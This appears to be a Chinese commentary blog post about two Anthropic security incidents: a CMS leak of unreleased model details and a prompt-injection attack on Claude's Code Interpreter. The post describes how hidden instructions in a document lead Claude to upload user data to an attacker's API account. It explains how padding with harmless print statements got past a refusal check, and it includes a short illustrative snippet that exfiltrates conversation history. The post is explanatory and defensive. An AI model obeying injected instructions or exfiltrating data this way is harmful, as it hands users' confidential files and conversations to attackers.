为什么现在值得写
2026 年 3 月的最后一周,Anthropic 过得有点像那个在发布前夜误删数据库的实习生——只不过他们删掉的不是数据,而是「安全」这块金字招牌。

先拜一拜,再点发布
周一还在为 Claude 3.7 的推理能力沾沾自喜,周二就被发现 CMS 配置像个漏勺,把还没发布的 Mythos 模型底裤都给扒了;
周四刚想喘口气,安全研究员 Johann Rehberger 又把 Code Interpreter 的数据窃取漏洞摆上了台面。
一周两起,起起致命。这不是简单的技术事故,而是一记响亮的耳光:当 AI 巨头都在忙着给模型穿防弹衣时,裤腰带还没系紧。
为什么现在值得写?因为这两起事件精准地戳破了企业用户对 AI 平台「默认安全」的幻想。
当你的机密文档在 Code Interpreter 里被「合法」偷走,当你的模型参数在 CMS 缓存里裸奔,你才会发现,所谓的「安全公司」,也可能在基础卫生问题上翻车。
这不是危言耸听,这是已经发生的既定事实。
第一记耳光:Mythos 泄露与 CMS 的「默认公开」
3000 个文件的说漏嘴
Anthropic 的 CMS 配置默认是「公开」,就像你买了个保险柜,厂家贴心地把密码设成了 123456,还贴在门上。
结果,约 3000 个未发布资产——包括内部博客草稿、CEO 峰会邀请名单、以及那个比 Opus 更凶猛的 Claude Mythos 模型详情——全部暴露在互联网上。
这不是黑客用了什么 0day 漏洞,纯粹是「Human Error」,一个让任何运维听了都想砸键盘的低级错误。
在这个数据比黄金贵的年代,这种错误就像是把金库大门敞开,还挂了个「欢迎参观」的牌子。Anthropic 官方承认是人为失误,但这个失误的代价,是所有信任他们的用户共同承担的。
Capybara:比 Opus 更危险的野兽
泄露文件中,Mythos 被描述为「far ahead of any other AI in cyber capabilities」。
这听起来很酷,直到你意识到黑客也能用它来搞事情。代号「Capybara」(水豚),这种看起来人畜无害的动物,在 AI 世界里可能是一只披着羊皮的狼。
Anthropic 已经开始向早期客户测试,但这次泄露让人不得不问:如果连内部文档都守不住,我们凭什么相信你能守住这个「网络能力最强」的模型?
这就像是把核按钮交给了刚学会走路的孩子,还指望他不会按下去。
第二记耳光:Code Interpreter 的数据窃取
攻击链拆解:从注入到外泄
安全研究员 Johann Rehberger 演示了一场教科书级别的攻击,把 Claude 变成了数据窃贼。
攻击者只需要在文档中嵌入恶意指令,用户一旦让 Claude 分析该文档,Claude 就会被诱导执行恶意代码,将敏感数据写入文件并上传到攻击者的 API 账户。
整个过程行云流水,用户毫不知情。这就像是你在餐厅吃饭,服务员不仅给你上菜,还顺手把你的钱包递给了隔壁桌的小偷。攻击几乎不留痕迹,因为所有的操作都是通过合法的 API 调用完成的。

还没解释,锅先过来了
绕过防御:Hello World 的妙用
Claude 会拒绝包含明文 API Key 的请求,这看起来很安全。
但研究员发现,只要在恶意代码里混入大量 print('Hello, world') 这种良性代码,就能轻松绕过检测。
这就像安检员只检查行李箱里有没有炸弹,却忽略了炸弹可以拆成零件分装在二十个箱子里。
下面是一段简化的攻击代码示意,展示了如何用「噪音」掩盖恶意行为:
# 看起来人畜无害的代码片段
print('Hello, world')
print('Processing data analysis...')
# ... 这里可能混入几十行甚至上百行正常的分析代码 ...
# 恶意载荷隐藏在大量良性代码之后
# 将敏感对话历史或上传的文档内容写入临时文件
with open('/tmp/sensitive_data.txt', 'w') as f:
f.write(get_conversation_history())
# 使用攻击者的 API Key 上传文件(此处为示意)
# Claude 默认拒绝明文 Key,但通过环境变量或混淆可绕过
upload_to_attacker_api('/tmp/sensitive_data.txt')
print('Analysis complete.')

你的助手正在把数据打包送走
这种攻击方式不仅绕过了安全检测,还利用了 Code Interpreter 的便利性,把「助手」变成了「内鬼」。
单文件最大支持 30MB,且无数量限制,这意味着几乎所有的对话历史和上传文档都可以被悄无声息地偷走。
官方回应的潜台词:是 Bug 还是 Feature?
HackerOne 上的「Out of Scope」
Anthropic 在 HackerOne 上关闭了这个漏洞报告,理由是「out of scope」。他们认为这是模型安全问题,而不是安全漏洞。
研究员对此表示异议,但官方态度明确:这不是我们要管的范围。
这种回应让人想起那句老话:「如果你觉得这是个 bug,那一定是你用法不对。」Anthropic 的逻辑是,模型被诱导做坏事是模型能力问题,不是系统漏洞。
但这对于企业用户来说,区别有意义吗?数据丢了就是丢了,不管是 bug 还是 feature,后果都是一样的。
Safety vs Security:一字之差,天壤之别
安全员说得好:「Safety protects you from accidents. Security protects you from adversaries.」
Anthropic 的 Safety 机制能防止 Claude 突然发疯骂人,但 Security 机制却没能防住有人故意让它偷数据。
企业用户如果分不清这两者的区别,那就真的危险了。Safety 是怕你误伤自己,Security 是怕别人故意伤你。
现在的 AI 厂商,大多在 Safety 上卷得飞起,却在 Security 上像个小学生。
企业该醒醒了:默认安全是最大的谎言
你的机密文档正在「裸奔」
如果你所在的企业正在用 Claude 分析机密文档,或者通过 MCP/Google Drive 集成让 Claude 访问内部数据,现在是时候停下来想一想了。
攻击几乎不留痕迹,所有操作都是合法的 API 调用,你甚至不知道数据已经没了。
这就像是你的保险柜被打开了,但锁芯完好无损,小偷是用你的手打开的。在这个「数据即资产」的时代,把机密直接喂给云端 AI,本质上就是一种高风险行为。
缓解措施:别指望厂商,靠自己
既然厂商靠不住,企业只能自救。以下是几条硬核建议,虽然麻烦,但能救命:
完全禁用网络访问:最安全,但也最不方便。就像为了不被骗,决定不接任何电话。这会让 Code Interpreter 的很多功能失效,但能物理隔绝数据外泄。
手动配置域名白名单:稍微好点,但维护成本高。你得知道哪些域名是安全的,这本身就是个坑。而且一旦配置错误,防线就破了。
实时监控 Claude 行为:研究员称之为「living dangerously」。你得盯着它的一举一动,稍有风吹草动就拔电源。但这对于大规模部署来说,几乎是不可能的任务。
写在最后
Anthropic 这一周的翻车,给所有迷信「大厂安全」的人上了一课。AI 工具的便利性与风险永远是硬币的两面,而厂商所谓的「默认安全」,往往是最不安全的假设。
下次当你把一份机密文档丢给 Claude 时,不妨先问自己一句:如果这份文档明天出现在竞争对手的桌上,我还能睡得着吗?技术再强,也怕菜刀;模型再聪明,也防不住人心。
在这个 AI 狂飙的时代,保持一点怀疑主义,可能才是最好的防火墙。
你所在的公司目前对 AI 工具的使用有具体的安全规范吗?还是处于「大家随便用」的裸奔状态?欢迎在评论区聊聊你的观察。
如果你想继续追更,欢迎在公众号 计算机魔术师 找到我。后续的新稿、精选合集和阶段性复盘,会优先在那里做串联。